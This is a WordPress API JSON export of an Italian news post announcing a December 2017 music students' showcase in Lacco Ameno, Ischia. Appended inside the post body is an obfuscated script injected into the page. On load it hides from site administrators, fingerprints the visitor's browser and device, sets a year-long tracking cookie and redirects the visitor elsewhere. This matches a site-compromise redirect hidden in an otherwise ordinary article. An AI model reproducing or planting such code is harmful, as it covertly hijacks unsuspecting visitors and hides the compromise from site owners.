{"id":110,"date":"2017-12-15T21:09:45","date_gmt":"2017-12-15T20:09:45","guid":{"rendered":"http:\/\/ischia.org\/news\/?p=110"},"modified":"2017-12-15T21:09:45","modified_gmt":"2017-12-15T20:09:45","slug":"trentesima-rassegna-prof-raffaele-sena","status":"publish","type":"post","link":"https:\/\/ischia.org\/news\/trentesima-rassegna-prof-raffaele-sena\/","title":{"rendered":"Trentesima Rassegna \u201cprof. Raffaele Sena\u201d"},"content":{"rendered":"<p>degli studenti di musica dell\u2019isola d\u2019Ischia<br>\nSabato 16 dicembre 2017, alle ore 16, presso il Museo Archeologico di Villa Abusto di Lacco Ameno si terr\u00e0 la Trentesima Rassegna \u201cProf. Raffaele Sena\u201d degli studenti di musica dell\u2019isola d\u2019Ischia. L\u2019iniziativa \u00e8 organizzata dall\u2019Associazione Pro Casamicciola Terme con il patrocinio del Comune di Lacco Ameno. Ingresso libero. L\u2019evento nasce con l\u2019intento di valorizzare la diffusione della cultura musicale ad ogni livello, offrire una qualificata opportunit\u00e0 ai giovani studenti di musica di far partecipe l\u2019intera collettivit\u00e0 della loro esperienza artistica e favorire la pratica della musica d\u2019insieme. L\u2019iniziativa vuole, inoltre, promuovere, soprattutto a livello locale, le attivit\u00e0 creative dei giovani, fornendo loro delle opportunit\u00e0 di crescita poco esaltate e favorite, per venire incontro alle vitale necessit\u00e0 dei giovani di poter comunicare le proprie esperienze, di poter dialogare e confrontarsi in una societ\u00e0 in cui \u00e8 estremamente difficile poter emergere, farsi conoscere da un pubblico sempre pi\u00f9 vasto e consapevole. La Rassegna \u00e8 intitolata al prof. Raffaele Sena (1908-1998), indimenticabile fondatore e presidente degli Amici della Musica dell\u2019isola d\u2019Ischia, nonch\u00e9 lungimirante operatore turistico a cui l\u2019isola d\u2019Ischia deve tanto soprattutto per l\u2019instancabile sua opera per far conoscere Ischia oltre i confini nazionali. Fu proprio il prof. Sena a volere tale appuntamento con i giovani della nostra isola e, fino ad oggi, la manifestazione raccoglie unanimi consensi presso i giovani musicisti isolani.<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/#','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>degli studenti di musica dell\u2019isola d\u2019Ischia Sabato 16 dicembre 2017, alle ore 16, presso il Museo Archeologico&#8230;<\/p>\n","protected":false},"author":1,"featured_media":111,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[1],"tags":[],"class_list":["post-110","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-senza-categoria","wpcat-1-id"],"jetpack_publicize_connections":[],"_links":{"self":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/comments?post=110"}],"version-history":[{"count":1,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/110\/revisions"}],"predecessor-version":[{"id":112,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/110\/revisions\/112"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/media\/111"}],"wp:attachment":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/media?parent=110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/categories?post=110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/tags?post=110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}